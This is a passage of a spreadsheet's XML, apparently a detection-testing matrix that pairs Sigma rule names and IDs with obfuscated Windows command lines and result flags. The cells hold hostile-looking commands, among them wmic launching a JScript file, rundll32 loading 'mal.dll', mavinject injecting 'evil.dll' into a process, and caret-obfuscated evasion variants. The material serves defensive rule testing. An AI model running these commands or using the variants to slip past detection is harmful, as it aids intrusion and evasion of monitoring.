          <t>wmic process call create "cmd.exe /C set __COMPAT_LAYER= &amp;&amp; wscript.exe /"/E:jscript" //Nologo C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F463" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G463" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H463" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I463" s="43" t="n"/>
      <c r="J463" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K463" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="464" ht="15.75" customHeight="1" s="42">
      <c r="A464" s="36" t="n"/>
      <c r="B464" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C464" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D464" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E464" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "cmd.exe /"c" set __COMPAT_LAYER= &amp;&amp; wscript.exe -"/E:jscript" -"/Nologo" C:\Users\Public\impl.js"</t>
        </is>
      </c>
      <c r="F464" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G464" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H464" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I464" s="43" t="n"/>
      <c r="J464" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K464" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="465" ht="15.75" customHeight="1" s="42">
      <c r="A465" s="36" t="n"/>
      <c r="B465" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C465" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D465" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E465" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /"s" /n -"u""</t>
        </is>
      </c>
      <c r="F465" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G465" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H465" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I465" s="36" t="n"/>
      <c r="J465" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K465" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="466" ht="15.75" customHeight="1" s="42">
      <c r="A466" s="36" t="n"/>
      <c r="B466" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C466" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D466" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E466" s="36" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /S /N /u"</t>
        </is>
      </c>
      <c r="F466" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G466" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H466" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I466" s="36" t="n"/>
      <c r="J466" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K466" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="467" ht="15.75" customHeight="1" s="42">
      <c r="A467" s="43" t="n"/>
      <c r="B467" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C467" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D467" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E467" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n /"u""</t>
        </is>
      </c>
      <c r="F467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H467" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I467" s="43" t="n"/>
      <c r="J467" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K467" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="468" ht="15.75" customHeight="1" s="42">
      <c r="A468" s="36" t="n"/>
      <c r="B468" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C468" s="36" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D468" s="36" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E468" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /n -"u""</t>
        </is>
      </c>
      <c r="F468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H468" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I468" s="43" t="n"/>
      <c r="J468" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K468" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="469" ht="15.75" customHeight="1" s="42">
      <c r="A469" s="43" t="n"/>
      <c r="B469" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_susp_execution_via_office_process</t>
        </is>
      </c>
      <c r="C469" s="43" t="inlineStr">
        <is>
          <t>Suspicious WMIC Execution Via Office Process</t>
        </is>
      </c>
      <c r="D469" s="43" t="inlineStr">
        <is>
          <t>e1693bc8-7168-4eab-8718-cdcaa68a1738</t>
        </is>
      </c>
      <c r="E469" s="43" t="inlineStr">
        <is>
          <t>wmic process call create "rundll32.exe C:\ProgramData\mal.dll,DllRegisterServer /s /"n" /"u""</t>
        </is>
      </c>
      <c r="F469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H469" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I469" s="43" t="n"/>
      <c r="J469" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K469" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="470" ht="15.75" customHeight="1" s="42">
      <c r="A470" s="36" t="n"/>
      <c r="B470" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C470" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D470" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E470" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Users\Victim\Downloads\ &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H470" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I470" s="43" t="n"/>
      <c r="J470" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K470" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="471" ht="15.75" customHeight="1" s="42">
      <c r="A471" s="43" t="n"/>
      <c r="B471" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C471" s="43" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D471" s="43" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E471" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "copy C:\Windows\hh.exe C:\ProgramData\not_hh.exe &amp;&amp; C:\ProgramData\not_hh.exe C:\Users\%USERNAME%\Documents\payload.chm"</t>
        </is>
      </c>
      <c r="F471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H471" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I471" s="43" t="n"/>
      <c r="J471" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K471" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="472" ht="15.75" customHeight="1" s="42">
      <c r="A472" s="36" t="n"/>
      <c r="B472" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hh_susp_execution</t>
        </is>
      </c>
      <c r="C472" s="36" t="inlineStr">
        <is>
          <t>Suspicious HH.EXE Execution</t>
        </is>
      </c>
      <c r="D472" s="36" t="inlineStr">
        <is>
          <t>e8a95b5e-c891-46e2-b33a-93937d3abc31</t>
        </is>
      </c>
      <c r="E472" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd %USERPROFILE%\Downloads &amp;&amp; hh.exe payload.chm"</t>
        </is>
      </c>
      <c r="F472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H472" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I472" s="43" t="n"/>
      <c r="J472" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K472" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="473" ht="15.75" customHeight="1" s="42">
      <c r="A473" s="43" t="n"/>
      <c r="B473" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C473" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D473" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E473" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "C:\Windows\Temp\t^mp.bat"</t>
        </is>
      </c>
      <c r="F473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H473" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I473" s="43" t="n"/>
      <c r="J473" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K473" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="474" ht="15.75" customHeight="1" s="42">
      <c r="A474" s="36" t="n"/>
      <c r="B474" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_redmimicry_winnti_playbook</t>
        </is>
      </c>
      <c r="C474" s="36" t="inlineStr">
        <is>
          <t>HackTool - RedMimicry Winnti Playbook Execution</t>
        </is>
      </c>
      <c r="D474" s="36" t="inlineStr">
        <is>
          <t>95022b85-ff2a-49fa-939a-d7b8f56eeb9b</t>
        </is>
      </c>
      <c r="E474" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "cd C:\Windows\Temp &amp;&amp; tmp.bat"</t>
        </is>
      </c>
      <c r="F474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H474" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I474" s="43" t="n"/>
      <c r="J474" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K474" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="475" ht="15.75" customHeight="1" s="42">
      <c r="A475" s="43" t="inlineStr">
        <is>
          <t>t1218.011</t>
        </is>
      </c>
      <c r="B475" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_rundll32_installscreensaver</t>
        </is>
      </c>
      <c r="C475" s="36" t="inlineStr">
        <is>
          <t>Rundll32 InstallScreenSaver Execution</t>
        </is>
      </c>
      <c r="D475" s="36" t="inlineStr">
        <is>
          <t>15bd98ea-55f4-4d37-b09a-e7caa0fa2221</t>
        </is>
      </c>
      <c r="E475" s="36" t="inlineStr">
        <is>
          <t>cmd.exe /c "rundll32.exe desk.cpl,InstallScreen^Saver not_an_scr.scr"</t>
        </is>
      </c>
      <c r="F475" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G475" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H475" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I475" s="36" t="n"/>
      <c r="J475" s="36" t="n">
        <v>2</v>
      </c>
      <c r="K475" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="476" ht="15.75" customHeight="1" s="42">
      <c r="A476" s="36" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B476" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C476" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D476" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E476" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\mavinject.exe 1234 -"INJECTRUNNING" C:\path\to\malicious.dll</t>
        </is>
      </c>
      <c r="F476" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G476" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H476" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I476" s="36" t="n"/>
      <c r="J476" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K476" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="477" ht="15.75" customHeight="1" s="42">
      <c r="A477" s="43" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B477" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C477" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D477" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E477" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /"INJECTRUNNING\tC:\temp\evil.dll"</t>
        </is>
      </c>
      <c r="F477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H477" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I477" s="43" t="n"/>
      <c r="J477" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K477" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="478" ht="15.75" customHeight="1" s="42">
      <c r="A478" s="36" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B478" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C478" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D478" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E478" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /INjectRUNNInG\Tc:\TemP\Evil.DlL</t>
        </is>
      </c>
      <c r="F478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H478" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I478" s="43" t="n"/>
      <c r="J478" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K478" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="479" ht="15.75" customHeight="1" s="42">
      <c r="A479" s="43" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B479" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C479" s="43" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D479" s="43" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E479" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 -"INJECTRUNNING\tC:\temp\evil.dll"</t>
        </is>
      </c>
      <c r="F479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H479" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I479" s="43" t="n"/>
      <c r="J479" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K479" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="480" ht="15.75" customHeight="1" s="42">
      <c r="A480" s="36" t="inlineStr">
        <is>
          <t>t1218.013</t>
        </is>
      </c>
      <c r="B480" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_lolbin_mavinject_process_injection</t>
        </is>
      </c>
      <c r="C480" s="36" t="inlineStr">
        <is>
          <t>Mavinject Inject DLL Into Running Process</t>
        </is>
      </c>
      <c r="D480" s="36" t="inlineStr">
        <is>
          <t>4f73421b-5a0b-4bbf-a892-5a7fb99bea66</t>
        </is>
      </c>
      <c r="E480" s="43" t="inlineStr">
        <is>
          <t>mavinject.exe 1234 /iNJECTRUnniNg\tC:\TEmp\evIl.dll</t>
        </is>
      </c>
      <c r="F480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H480" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I480" s="43" t="n"/>
      <c r="J480" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K480" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="481" ht="15.75" customHeight="1" s="42">
      <c r="A481" s="43" t="inlineStr">
        <is>
          <t>t1219.002</t>
        </is>
      </c>
      <c r="B481" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_remote_access_tools_renamed_meshagent_execution</t>
        </is>
      </c>
      <c r="C481" s="36" t="inlineStr">
        <is>
          <t>Remote Access Tool - Renamed MeshAgent Execution - Windows</t>
        </is>
      </c>
      <c r="D481" s="36" t="inlineStr">
        <is>
          <t>b471f462-eb0d-4832-be35-28d94bdb4780</t>
        </is>
      </c>
      <c r="E481" s="36" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c "svchost.exe --m^eshServiceName"</t>
        </is>
      </c>
      <c r="F481" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G481" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H481" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I481" s="43" t="n"/>
      <c r="J481" s="36" t="n">
        <v>1</v>
      </c>
      <c r="K481" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="482" ht="15.75" customHeight="1" s="42">
      <c r="A482" s="43" t="n"/>
      <c r="B482" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C482" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D482" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E482" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /node:localhost process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F482" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G482" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H482" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I482" s="43" t="n"/>
      <c r="J482" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K482" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="483" ht="15.75" customHeight="1" s="42">
      <c r="A483" s="43" t="n"/>
      <c r="B483" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C483" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D483" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E483" s="36" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe -"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F483" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G483" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H483" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I483" s="43" t="n"/>
      <c r="J483" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K483" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="484" ht="15.75" customHeight="1" s="42">
      <c r="A484" s="43" t="n"/>
      <c r="B484" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C484" s="43" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D484" s="43" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E484" s="43" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /"node:localhost" process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H484" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I484" s="43" t="n"/>
      <c r="J484" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K484" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="485" ht="15.75" customHeight="1" s="42">
      <c r="A485" s="36" t="n"/>
      <c r="B485" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C485" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D485" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E485" s="43" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /noDe:LOCALhosT process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H485" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I485" s="43" t="n"/>
      <c r="J485" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K485" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="486" ht="15.75" customHeight="1" s="42">
      <c r="A486" s="43" t="n"/>
      <c r="B486" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_wmic_squiblytwo_bypass</t>
        </is>
      </c>
      <c r="C486" s="36" t="inlineStr">
        <is>
          <t>Potential SquiblyTwo Technique Execution</t>
        </is>
      </c>
      <c r="D486" s="36" t="inlineStr">
        <is>
          <t>8d63dadf-b91b-4187-87b6-34a1114577ea</t>
        </is>
      </c>
      <c r="E486" s="43" t="inlineStr">
        <is>
          <t>C:\\Windows\\System32\\wmic.exe /nOdE:lOcalHoST process where name='svchost.exe' get CommandLine</t>
        </is>
      </c>
      <c r="F486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H486" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I486" s="43" t="n"/>
      <c r="J486" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K486" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="487" ht="15.75" customHeight="1" s="42">
      <c r="A487" s="43" t="inlineStr">
        <is>
          <t>t1222.001</t>
        </is>
      </c>
      <c r="B487" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_takeown_recursive_own</t>
        </is>
      </c>
      <c r="C487" s="36" t="inlineStr">
        <is>
          <t>Suspicious Recursive Takeown</t>
        </is>
      </c>
      <c r="D487" s="36" t="inlineStr">
        <is>
          <t>554601fb-9b71-4bcc-abf4-21a611be4fde</t>
        </is>
      </c>
      <c r="E487" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "takeown.exe /^f C:\Users	haim\AppData\Local\Temp\T1222.001_takeown_folder /^r"</t>
        </is>
      </c>
      <c r="F487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H487" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I487" s="43" t="n"/>
      <c r="J487" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K487" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="488" ht="15.75" customHeight="1" s="42">
      <c r="A488" s="43" t="n"/>
      <c r="B488" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C488" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D488" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E488" s="43" t="inlineStr">
        <is>
          <t>cmd.exe /c "W^in^P^wn.exe"</t>
        </is>
      </c>
      <c r="F488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H488" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I488" s="43" t="n"/>
      <c r="J488" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K488" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="489" ht="15.75" customHeight="1" s="42">
      <c r="A489" s="36" t="n"/>
      <c r="B489" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C489" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D489" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E489" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F489" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G489" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H489" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I489" s="43" t="n"/>
      <c r="J489" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K489" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="490" ht="15.75" customHeight="1" s="42">
      <c r="A490" s="36" t="n"/>
      <c r="B490" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C490" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D490" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E490" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -"ep" bypass -FILE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F490" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G490" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H490" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I490" s="43" t="n"/>
      <c r="J490" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K490" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="491" ht="15.75" customHeight="1" s="42">
      <c r="A491" s="36" t="n"/>
      <c r="B491" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C491" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D491" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E491" s="36" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass /"file" C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F491" s="36" t="b">
        <v>0</v>
      </c>
      <c r="G491" s="36" t="b">
        <v>0</v>
      </c>
      <c r="H491" s="36" t="b">
        <v>0</v>
      </c>
      <c r="I491" s="43" t="n"/>
      <c r="J491" s="36" t="n">
        <v>0</v>
      </c>
      <c r="K491" s="36" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="492" ht="15.75" customHeight="1" s="42">
      <c r="A492" s="36" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B492" s="36" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C492" s="36" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D492" s="36" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E492" s="36" t="inlineStr">
        <is>
